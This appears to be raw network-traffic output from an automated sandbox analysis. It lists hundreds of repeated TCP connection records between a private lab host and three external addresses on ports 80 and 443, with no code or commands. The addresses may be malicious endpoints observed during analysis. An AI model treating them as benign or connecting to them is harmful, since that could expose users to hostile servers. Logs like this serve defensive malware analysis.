      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
